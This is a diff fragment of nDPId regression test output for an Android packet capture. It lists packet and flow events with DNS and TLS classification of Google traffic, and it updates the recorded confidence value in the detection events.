00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -259,24 +260,24 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} 